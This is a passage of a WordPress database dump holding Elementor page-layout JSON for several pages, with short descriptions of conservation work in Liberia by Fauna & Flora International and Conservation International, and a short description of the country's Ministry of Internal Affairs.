Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9b3912\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b6c777\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c8fb205\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9268,1620,'_elementor_controls_usage','a:0:{}'),(9269,1620,'_elementor_edit_mode','builder'),(9270,1620,'_elementor_template_type','wp-post'),(9271,1620,'_elementor_version','2.7.5'),(9272,1620,'_wp_page_template','default'),(9273,1620,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"37ef818\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1c00780\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"10a4e07\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e03e301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"b08a954\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9caf5f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9b3912\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"9b6c777\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c8fb205\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9274,1621,'_elementor_controls_usage','a:0:{}'),(9275,1621,'_elementor_edit_mode','builder'),(9276,1621,'_elementor_template_type','wp-post'),(9277,1621,'_elementor_version','2.7.5'),(9278,1621,'_wp_page_template','default'),(9279,1621,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"CI Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ec2e5d0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e82f88c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0808916\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7c7b495\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"31a9954\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68c504b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0808916\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"217b7a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"90753bc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9280,1622,'_elementor_controls_usage','a:0:{}'),(9281,1622,'_elementor_edit_mode','builder'),(9282,1622,'_elementor_template_type','wp-post'),(9283,1622,'_elementor_version','2.7.5'),(9284,1622,'_wp_page_template','default'),(9285,1622,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"CI Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ec2e5d0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e82f88c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0808916\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"7c7b495\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"31a9954\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68c504b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0808916\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"217b7a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"90753bc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9286,1623,'_elementor_controls_usage','a:0:{}'),(9287,1623,'_elementor_edit_mode','builder'),(9288,1623,'_elementor_template_type','wp-post'),(9289,1623,'_elementor_version','2.7.5'),(9290,1623,'_wp_page_template','default'),(9291,1623,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"MIA Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5da8f24\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"j